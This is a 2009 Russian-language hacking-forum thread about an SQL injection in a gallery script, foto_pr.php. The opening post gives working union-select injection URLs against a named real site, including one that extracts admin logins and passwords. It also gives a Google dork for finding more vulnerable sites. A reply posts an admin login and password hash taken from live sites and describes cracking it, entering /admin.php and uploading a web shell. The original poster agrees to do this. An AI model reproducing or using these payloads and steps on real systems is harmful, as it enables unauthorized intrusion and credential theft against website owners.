ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

foto_pr.php (Уязвимость)
  #1  
Старый 17.02.2009, 22:47
Аватар для Assembler
Assembler
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964

Репутация: 302
Отправить сообщение для Assembler с помощью ICQ
По умолчанию foto_pr.php (Уязвимость)

Начну с того что сайты с уязвимостями ищу через гулевский allinurl:
Тут недавно наткнулся на сайт фото галереи http://pix.in.ua/foto_pr.php?id=-16%20union%20select%201,2,3,4,5,6,7,version()-- и сделал скулю..
Но факт в том что при запросе в гугле
allinurl: foto_pr.php вылазет много сайтов с одной и той же уязвимостью..
foto_pr.php?id=-16+union%20select+1,2,3,4,5,6,7,concat_ws(0x3a,id, name,login,pass) from gallery_admin--

Вопрос. Че это за движек такой..? =)

Последний раз редактировалось Assembler; 17.02.2009 в 22:53..
 
Ответить с цитированием

  #2  
Старый 17.02.2009, 23:23
Аватар для Jokester
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Много сайтов гугл выдаёт по запросу
allinurl: com_content

А в твоём случае их 9 штук .Это самопис какой-то ИМХО

ЗЫ Была где-то тема "помогите определить движок", но видимо при последнем сбое она пропала , я не нашол во всяком случае
 
Ответить с цитированием

  #3  
Старый 17.02.2009, 23:28
Аватар для faza02
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Assembler, без названия. просто движок.. он, как видишь не так популярен.
 
Ответить с цитированием

  #4  
Старый 17.02.2009, 23:37
Аватар для Assembler
Assembler
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964

Репутация: 302
Отправить сообщение для Assembler с помощью ICQ
По умолчанию

Мб будет каданить =))
 
Ответить с цитированием

  #5  
Старый 17.02.2009, 23:57
Аватар для Grey
Grey
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

Двиг самописный - открыл сайта 3-4 из того что выдал гугл на всех одна и та же пара логин-хеш:

Код:
bolt:f07ad2552c86bfd4d2396c0114f785ea
Побрутил немножко - сбручиваться оно не захотело, по этому положил прям таки логин)) на этот хеш.

Если очень интересно, то бруть хеш, попадай в админку (/admin.php), заливай шелл и изучай сорцы.
 
Ответить с цитированием

  #6  
Старый 18.02.2009, 00:02
Аватар для faza02
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

http://www.google.ru/search?hl=ru&q=f07ad2552c86bfd4d2396c0114f785ea&bt nG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA+%D0%B2+Google&lr =&aq=f&oq=

мм, а хэш знаменит.
 
Ответить с цитированием

  #7  
Старый 18.02.2009, 00:02
Аватар для Assembler
Assembler
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964

Репутация: 302
Отправить сообщение для Assembler с помощью ICQ
По умолчанию

Цитата:
Сообщение от Grey  
Двиг самописный - открыл сайта 3-4 из того что выдал гугл на всех одна и та же пара логин-хеш:

Код:
bolt:f07ad2552c86bfd4d2396c0114f785ea
Побрутил немножко - сбручиваться оно не захотело, по этому положил прям таки логин)) на этот хеш.

Если очень интересно, то бруть хеш, попадай в админку (/admin.php), заливай шелл и изучай сорцы.
Оке, так и сделаю =)
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Os - моя крепость Elekt Избранное 32 06.08.2009 15:10
Дыра в Word позволяет захватить контроль над ПК »Atom1c« Мировые новости 17 12.12.2006 13:15
Подборка уязвимостей phpBB -=ka$at1k=- Форумы 3 02.07.2006 15:26
Уязвимость WZC в Windows XP DRON-ANARCHY Мировые новости 5 10.10.2005 23:16
Открытие файлов и внешние данные. Потенциальная уязвимость php-скриптов k00p3r Чужие Статьи 1 11.07.2005 19:23



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ